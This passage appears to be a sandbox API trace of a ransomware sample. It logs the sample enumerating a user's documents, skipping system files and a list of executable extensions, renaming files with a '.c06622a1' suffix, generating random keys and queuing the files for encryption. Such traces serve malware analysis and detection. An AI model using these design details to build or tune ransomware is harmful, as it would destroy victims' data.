(_Str1="msu", _Str2="pps") returned -3 [0148.749] wcslen (_String="msu") returned 0x3 [0148.749] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0148.749] wcslen (_String="nls") returned 0x3 [0148.749] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0148.749] wcslen (_String="nomedia") returned 0x7 [0148.749] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0148.749] wcslen (_String="ocx") returned 0x3 [0148.749] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0148.749] wcslen (_String="prf") returned 0x3 [0148.749] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0148.749] wcslen (_String="ps1") returned 0x3 [0148.749] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0148.749] wcslen (_String="rom") returned 0x3 [0148.750] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0148.750] wcslen (_String="rtp") returned 0x3 [0148.750] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0148.750] wcslen (_String="scr") returned 0x3 [0148.750] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0148.750] wcslen (_String="shs") returned 0x3 [0148.750] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0148.750] wcslen (_String="spl") returned 0x3 [0148.750] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0148.750] wcslen (_String="sys") returned 0x3 [0148.750] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0148.750] wcslen (_String="theme") returned 0x5 [0148.750] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0148.750] wcslen (_String="themepack") returned 0x9 [0148.750] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0148.750] wcslen (_String="wpx") returned 0x3 [0148.750] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0148.750] wcslen (_String="lock") returned 0x4 [0148.750] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0148.750] wcslen (_String="key") returned 0x3 [0148.750] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0148.750] wcslen (_String="hta") returned 0x3 [0148.750] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0148.750] wcslen (_String="msi") returned 0x3 [0148.750] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0148.750] wcslen (_String="pdb") returned 0x3 [0148.750] _wcsicmp (_Str1="sql", _Str2="pps") returned 3 [0148.750] wcslen (_String="sql") returned 0x3 [0148.750] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0148.750] wcslen (_String="sqlite") returned 0x6 [0148.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w")) returned 0x10 [0148.750] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.751] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" [0148.751] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned 0x3a [0148.751] wcscpy (in: _Dest=0x4500106, _Source="g7mZ8kCwoJpt1.pps" | out: _Dest="g7mZ8kCwoJpt1.pps") returned="g7mZ8kCwoJpt1.pps" [0148.751] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps", dwFileAttributes=0x80) returned 1 [0148.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\g7mz8kcwojpt1.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0148.751] SetFilePointerEx (in: hFile=0x614, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.751] ReadFile (in: hFile=0x614, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.752] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xae8fb03 [0148.752] RtlComputeCrc32 (PartialCrc=0xfb03, Buffer=0x3fe8f4, Length=0x80) returned 0x80769a3c [0148.752] RtlComputeCrc32 (PartialCrc=0x9a3c, Buffer=0x3fe8f4, Length=0x80) returned 0x9f86d91b [0148.752] RtlComputeCrc32 (PartialCrc=0xd91b, Buffer=0x3fe8f4, Length=0x80) returned 0xd8e9b80c [0148.752] RtlComputeCrc32 (PartialCrc=0xb80c, Buffer=0x3fe8f4, Length=0x80) returned 0x543c2e16 [0148.752] CloseHandle (hObject=0x614) returned 1 [0148.752] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.752] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps" [0148.752] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps") returned 0x4c [0148.753] wcscpy (in: _Dest=0x4510130, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.753] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\g7mz8kcwojpt1.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\g7mz8kcwojpt1.pps.c06622a1"), dwFlags=0x8) returned 1 [0148.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\g7mZ8kCwoJpt1.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\g7mz8kcwojpt1.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x614 [0148.757] CreateIoCompletionPort (FileHandle=0x614, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.757] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58732149 [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x38994a48 [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4946e28f [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa91b8be [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25ec4843 [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65c0b706 [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x214231a6 [0148.762] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66002fe8 [0148.765] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xb63f8468 [0148.765] RtlComputeCrc32 (PartialCrc=0x8468, Buffer=0x2f30094, Length=0x80) returned 0xed5fde02 [0148.765] RtlComputeCrc32 (PartialCrc=0xde02, Buffer=0x2f30094, Length=0x80) returned 0x5d4b2f5d [0148.765] RtlComputeCrc32 (PartialCrc=0x2f5d, Buffer=0x2f30094, Length=0x80) returned 0x9599739f [0148.765] RtlComputeCrc32 (PartialCrc=0x739f, Buffer=0x2f30094, Length=0x80) returned 0x8d61fd35 [0148.765] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.765] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.765] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.765] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9b2200, ftCreationTime.dwHighDateTime=0x1d5e335, ftLastAccessTime.dwLowDateTime=0x57889ce0, ftLastAccessTime.dwHighDateTime=0x1d5de92, ftLastWriteTime.dwLowDateTime=0x57889ce0, ftLastWriteTime.dwHighDateTime=0x1d5de92, nFileSizeHigh=0x0, nFileSizeLow=0x27e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hKLGhQi.odp", cAlternateFileName="")) returned 1 [0148.765] _wcsicmp (_Str1="hKLGhQi.odp", _Str2="README.c06622a1.TXT") returned -10 [0148.766] wcsstr (_Str="hKLGhQi.odp", _SubStr="README") returned 0x0 [0148.766] _wcsicmp (_Str1="autorun.inf", _Str2="hKLGhQi.odp") returned -7 [0148.766] wcslen (_String="autorun.inf") returned 0xb [0148.766] _wcsicmp (_Str1="boot.ini", _Str2="hKLGhQi.odp") returned -6 [0148.766] wcslen (_String="boot.ini") returned 0x8 [0148.766] _wcsicmp (_Str1="bootfont.bin", _Str2="hKLGhQi.odp") returned -6 [0148.766] wcslen (_String="bootfont.bin") returned 0xc [0148.766] _wcsicmp (_Str1="bootsect.bak", _Str2="hKLGhQi.odp") returned -6 [0148.766] wcslen (_String="bootsect.bak") returned 0xc [0148.766] _wcsicmp (_Str1="desktop.ini", _Str2="hKLGhQi.odp") returned -4 [0148.766] wcslen (_String="desktop.ini") returned 0xb [0148.766] _wcsicmp (_Str1="iconcache.db", _Str2="hKLGhQi.odp") returned 1 [0148.766] wcslen (_String="iconcache.db") returned 0xc [0148.766] _wcsicmp (_Str1="ntldr", _Str2="hKLGhQi.odp") returned 6 [0148.766] wcslen (_String="ntldr") returned 0x5 [0148.766] _wcsicmp (_Str1="ntuser.dat", _Str2="hKLGhQi.odp") returned 6 [0148.766] wcslen (_String="ntuser.dat") returned 0xa [0148.766] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hKLGhQi.odp") returned 6 [0148.766] wcslen (_String="ntuser.dat.log") returned 0xe [0148.766] _wcsicmp (_Str1="ntuser.ini", _Str2="hKLGhQi.odp") returned 6 [0148.766] wcslen (_String="ntuser.ini") returned 0xa [0148.766] _wcsicmp (_Str1="thumbs.db", _Str2="hKLGhQi.odp") returned 12 [0148.766] wcslen (_String="thumbs.db") returned 0x9 [0148.766] _wcsicmp (_Str1="386", _Str2="odp") returned -60 [0148.766] wcslen (_String="386") returned 0x3 [0148.766] _wcsicmp (_Str1="adv", _Str2="odp") returned -14 [0148.766] wcslen (_String="adv") returned 0x3 [0148.766] _wcsicmp (_Str1="ani", _Str2="odp") returned -14 [0148.766] wcslen (_String="ani") returned 0x3 [0148.766] _wcsicmp (_Str1="bat", _Str2="odp") returned -13 [0148.766] wcslen (_String="bat") returned 0x3 [0148.766] _wcsicmp (_Str1="bin", _Str2="odp") returned -13 [0148.766] wcslen (_String="bin") returned 0x3 [0148.766] _wcsicmp (_Str1="cab", _Str2="odp") returned -12 [0148.766] wcslen (_String="cab") returned 0x3 [0148.766] _wcsicmp (_Str1="cmd", _Str2="odp") returned -12 [0148.767] wcslen (_String="cmd") returned 0x3 [0148.767] _wcsicmp (_Str1="com", _Str2="odp") returned -12 [0148.767] wcslen (_String="com") returned 0x3 [0148.767] _wcsicmp (_Str1="cpl", _Str2="odp") returned -12 [0148.767] wcslen (_String="cpl") returned 0x3 [0148.767] _wcsicmp (_Str1="cur", _Str2="odp") returned -12 [0148.767] wcslen (_String="cur") returned 0x3 [0148.767] _wcsicmp (_Str1="deskthemepack", _Str2="odp") returned -11 [0148.767] wcslen (_String="deskthemepack") returned 0xd [0148.767] _wcsicmp (_Str1="diagcab", _Str2="odp") returned -11 [0148.767] wcslen (_String="diagcab") returned 0x7 [0148.767] _wcsicmp (_Str1="diagcfg", _Str2="odp") returned -11 [0148.767] wcslen (_String="diagcfg") returned 0x7 [0148.767] _wcsicmp (_Str1="diagpkg", _Str2="odp") returned -11 [0148.767] wcslen (_String="diagpkg") returned 0x7 [0148.767] _wcsicmp (_Str1="dll", _Str2="odp") returned -11 [0148.767] wcslen (_String="dll") returned 0x3 [0148.767] _wcsicmp (_Str1="drv", _Str2="odp") returned -11 [0148.767] wcslen (_String="drv") returned 0x3 [0148.767] _wcsicmp (_Str1="exe", _Str2="odp") returned -10 [0148.767] wcslen (_String="exe") returned 0x3 [0148.767] _wcsicmp (_Str1="hlp", _Str2="odp") returned -7 [0148.767] wcslen (_String="hlp") returned 0x3 [0148.767] _wcsicmp (_Str1="icl", _Str2="odp") returned -6 [0148.767] wcslen (_String="icl") returned 0x3 [0148.767] _wcsicmp (_Str1="icns", _Str2="odp") returned -6 [0148.767] wcslen (_String="icns") returned 0x4 [0148.767] _wcsicmp (_Str1="ico", _Str2="odp") returned -6 [0148.767] wcslen (_String="ico") returned 0x3 [0148.767] _wcsicmp (_Str1="ics", _Str2="odp") returned -6 [0148.767] wcslen (_String="ics") returned 0x3 [0148.767] _wcsicmp (_Str1="idx", _Str2="odp") returned -6 [0148.767] wcslen (_String="idx") returned 0x3 [0148.767] _wcsicmp (_Str1="ldf", _Str2="odp") returned -3 [0148.767] wcslen (_String="ldf") returned 0x3 [0148.767] _wcsicmp (_Str1="lnk", _Str2="odp") returned -3 [0148.767] wcslen (_String="lnk") returned 0x3 [0148.767] _wcsicmp (_Str1="mod", _Str2="odp") returned -2 [0148.767] wcslen (_String="mod") returned 0x3 [0148.768] _wcsicmp (_Str1="mpa", _Str2="odp") returned -2 [0148.768] wcslen (_String="mpa") returned 0x3 [0148.768] _wcsicmp (_Str1="msc", _Str2="odp") returned -2 [0148.768] wcslen (_String="msc") returned 0x3 [0148.768] _wcsicmp (_Str1="msp", _Str2="odp") returned -2 [0148.768] wcslen (_String="msp") returned 0x3 [0148.768] _wcsicmp (_Str1="msstyles", _Str2="odp") returned -2 [0148.768] wcslen (_String="msstyles") returned 0x8 [0148.768] _wcsicmp (_Str1="msu", _Str2="odp") returned -2 [0148.768] wcslen (_String="msu") returned 0x3 [0148.768] _wcsicmp (_Str1="nls", _Str2="odp") returned -1 [0148.768] wcslen (_String="nls") returned 0x3 [0148.768] _wcsicmp (_Str1="nomedia", _Str2="odp") returned -1 [0148.768] wcslen (_String="nomedia") returned 0x7 [0148.768] _wcsicmp (_Str1="ocx", _Str2="odp") returned -1 [0148.768] wcslen (_String="ocx") returned 0x3 [0148.768] _wcsicmp (_Str1="prf", _Str2="odp") returned 1 [0148.768] wcslen (_String="prf") returned 0x3 [0148.768] _wcsicmp (_Str1="ps1", _Str2="odp") returned 1 [0148.768] wcslen (_String="ps1") returned 0x3 [0148.768] _wcsicmp (_Str1="rom", _Str2="odp") returned 3 [0148.768] wcslen (_String="rom") returned 0x3 [0148.768] _wcsicmp (_Str1="rtp", _Str2="odp") returned 3 [0148.768] wcslen (_String="rtp") returned 0x3 [0148.768] _wcsicmp (_Str1="scr", _Str2="odp") returned 4 [0148.768] wcslen (_String="scr") returned 0x3 [0148.768] _wcsicmp (_Str1="shs", _Str2="odp") returned 4 [0148.768] wcslen (_String="shs") returned 0x3 [0148.768] _wcsicmp (_Str1="spl", _Str2="odp") returned 4 [0148.768] wcslen (_String="spl") returned 0x3 [0148.768] _wcsicmp (_Str1="sys", _Str2="odp") returned 4 [0148.768] wcslen (_String="sys") returned 0x3 [0148.768] _wcsicmp (_Str1="theme", _Str2="odp") returned 5 [0148.768] wcslen (_String="theme") returned 0x5 [0148.768] _wcsicmp (_Str1="themepack", _Str2="odp") returned 5 [0148.768] wcslen (_String="themepack") returned 0x9 [0148.768] _wcsicmp (_Str1="wpx", _Str2="odp") returned 8 [0148.768] wcslen (_String="wpx") returned 0x3 [0148.769] _wcsicmp (_Str1="lock", _Str2="odp") returned -3 [0148.769] wcslen (_String="lock") returned 0x4 [0148.769] _wcsicmp (_Str1="key", _Str2="odp") returned -4 [0148.769] wcslen (_String="key") returned 0x3 [0148.769] _wcsicmp (_Str1="hta", _Str2="odp") returned -7 [0148.769] wcslen (_String="hta") returned 0x3 [0148.769] _wcsicmp (_Str1="msi", _Str2="odp") returned -2 [0148.769] wcslen (_String="msi") returned 0x3 [0148.769] _wcsicmp (_Str1="pdb", _Str2="odp") returned 1 [0148.769] wcslen (_String="pdb") returned 0x3 [0148.769] _wcsicmp (_Str1="sql", _Str2="odp") returned 4 [0148.769] wcslen (_String="sql") returned 0x3 [0148.769] _wcsicmp (_Str1="sqlite", _Str2="odp") returned 4 [0148.769] wcslen (_String="sqlite") returned 0x6 [0148.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w")) returned 0x10 [0148.769] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.769] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" [0148.769] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned 0x3a [0148.769] wcscpy (in: _Dest=0x4500106, _Source="hKLGhQi.odp" | out: _Dest="hKLGhQi.odp") returned="hKLGhQi.odp" [0148.769] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp", dwFileAttributes=0x80) returned 1 [0148.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\hklghqi.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0148.769] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.770] ReadFile (in: hFile=0x66c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.770] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x9fdc04f5 [0148.770] RtlComputeCrc32 (PartialCrc=0x4f5, Buffer=0x3fe8f4, Length=0x80) returned 0x3f8f872 [0148.771] RtlComputeCrc32 (PartialCrc=0xf872, Buffer=0x3fe8f4, Length=0x80) returned 0xbf4f05db [0148.771] RtlComputeCrc32 (PartialCrc=0x5db, Buffer=0x3fe8f4, Length=0x80) returned 0x49677cd1 [0148.771] RtlComputeCrc32 (PartialCrc=0x7cd1, Buffer=0x3fe8f4, Length=0x80) returned 0x6833770a [0148.771] CloseHandle (hObject=0x66c) returned 1 [0148.771] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.771] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp" [0148.771] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp") returned 0x46 [0148.771] wcscpy (in: _Dest=0x4510124, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.771] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\hklghqi.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\hklghqi.odp.c06622a1"), dwFlags=0x8) returned 1 [0148.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\hKLGhQi.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\hklghqi.odp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0148.773] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.773] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fabc315 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12e22858 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x223bc777 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ca816e7 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x109a6e68 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33bfd9f9 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x507282d6 [0148.780] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x906b5ce [0148.786] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x4e104b9f [0148.786] RtlComputeCrc32 (PartialCrc=0x4b9f, Buffer=0x41f0094, Length=0x80) returned 0x3d0e4da2 [0148.786] RtlComputeCrc32 (PartialCrc=0x4da2, Buffer=0x41f0094, Length=0x80) returned 0xe8b52589 [0148.786] RtlComputeCrc32 (PartialCrc=0x2589, Buffer=0x41f0094, Length=0x80) returned 0xc939393a [0148.786] RtlComputeCrc32 (PartialCrc=0x393a, Buffer=0x41f0094, Length=0x80) returned 0xc3896828 [0148.786] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.786] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.787] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.787] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4818d910, ftCreationTime.dwHighDateTime=0x1d5e3c8, ftLastAccessTime.dwLowDateTime=0x3aea0640, ftLastAccessTime.dwHighDateTime=0x1d5e569, ftLastWriteTime.dwLowDateTime=0x3aea0640, ftLastWriteTime.dwHighDateTime=0x1d5e569, nFileSizeHigh=0x0, nFileSizeLow=0xd4df, dwReserved0=0x0, dwReserved1=0x0, cFileName="lcfPkoCr.xls", cAlternateFileName="")) returned 1 [0148.787] _wcsicmp (_Str1="lcfPkoCr.xls", _Str2="README.c06622a1.TXT") returned -6 [0148.787] wcsstr (_Str="lcfPkoCr.xls", _SubStr="README") returned 0x0 [0148.787] _wcsicmp (_Str1="autorun.inf", _Str2="lcfPkoCr.xls") returned -11 [0148.787] wcslen (_String="autorun.inf") returned 0xb [0148.787] _wcsicmp (_Str1="boot.ini", _Str2="lcfPkoCr.xls") returned -10 [0148.787] wcslen (_String="boot.ini") returned 0x8 [0148.787] _wcsicmp (_Str1="bootfont.bin", _Str2="lcfPkoCr.xls") returned -10 [0148.787] wcslen (_String="bootfont.bin") returned 0xc [0148.787] _wcsicmp (_Str1="bootsect.bak", _Str2="lcfPkoCr.xls") returned -10 [0148.787] wcslen (_String="bootsect.bak") returned 0xc [0148.787] _wcsicmp (_Str1="desktop.ini", _Str2="lcfPkoCr.xls") returned -8 [0148.787] wcslen (_String="desktop.ini") returned 0xb [0148.787] _wcsicmp (_Str1="iconcache.db", _Str2="lcfPkoCr.xls") returned -3 [0148.787] wcslen (_String="iconcache.db") returned 0xc [0148.787] _wcsicmp (_Str1="ntldr", _Str2="lcfPkoCr.xls") returned 2 [0148.787] wcslen (_String="ntldr") returned 0x5 [0148.787] _wcsicmp (_Str1="ntuser.dat", _Str2="lcfPkoCr.xls") returned 2 [0148.787] wcslen (_String="ntuser.dat") returned 0xa [0148.787] _wcsicmp (_Str1="ntuser.dat.log", _Str2="lcfPkoCr.xls") returned 2 [0148.787] wcslen (_String="ntuser.dat.log") returned 0xe [0148.787] _wcsicmp (_Str1="ntuser.ini", _Str2="lcfPkoCr.xls") returned 2 [0148.787] wcslen (_String="ntuser.ini") returned 0xa [0148.787] _wcsicmp (_Str1="thumbs.db", _Str2="lcfPkoCr.xls") returned 8 [0148.788] wcslen (_String="thumbs.db") returned 0x9 [0148.788] _wcsicmp (_Str1="386", _Str2="xls") returned -69 [0148.788] wcslen (_String="386") returned 0x3 [0148.788] _wcsicmp (_Str1="adv", _Str2="xls") returned -23 [0148.788] wcslen (_String="adv") returned 0x3 [0148.788] _wcsicmp (_Str1="ani", _Str2="xls") returned -23 [0148.788] wcslen (_String="ani") returned 0x3 [0148.788] _wcsicmp (_Str1="bat", _Str2="xls") returned -22 [0148.788] wcslen (_String="bat") returned 0x3 [0148.788] _wcsicmp (_Str1="bin", _Str2="xls") returned -22 [0148.788] wcslen (_String="bin") returned 0x3 [0148.788] _wcsicmp (_Str1="cab", _Str2="xls") returned -21 [0148.788] wcslen (_String="cab") returned 0x3 [0148.788] _wcsicmp (_Str1="cmd", _Str2="xls") returned -21 [0148.788] wcslen (_String="cmd") returned 0x3 [0148.788] _wcsicmp (_Str1="com", _Str2="xls") returned -21 [0148.788] wcslen (_String="com") returned 0x3 [0148.788] _wcsicmp (_Str1="cpl", _Str2="xls") returned -21 [0148.788] wcslen (_String="cpl") returned 0x3 [0148.788] _wcsicmp (_Str1="cur", _Str2="xls") returned -21 [0148.788] wcslen (_String="cur") returned 0x3 [0148.788] _wcsicmp (_Str1="deskthemepack", _Str2="xls") returned -20 [0148.788] wcslen (_String="deskthemepack") returned 0xd [0148.788] _wcsicmp (_Str1="diagcab", _Str2="xls") returned -20 [0148.788] wcslen (_String="diagcab") returned 0x7 [0148.788] _wcsicmp (_Str1="diagcfg", _Str2="xls") returned -20 [0148.788] wcslen (_String="diagcfg") returned 0x7 [0148.788] _wcsicmp (_Str1="diagpkg", _Str2="xls") returned -20 [0148.788] wcslen (_String="diagpkg") returned 0x7 [0148.788] _wcsicmp (_Str1="dll", _Str2="xls") returned -20 [0148.788] wcslen (_String="dll") returned 0x3 [0148.789] _wcsicmp (_Str1="drv", _Str2="xls") returned -20 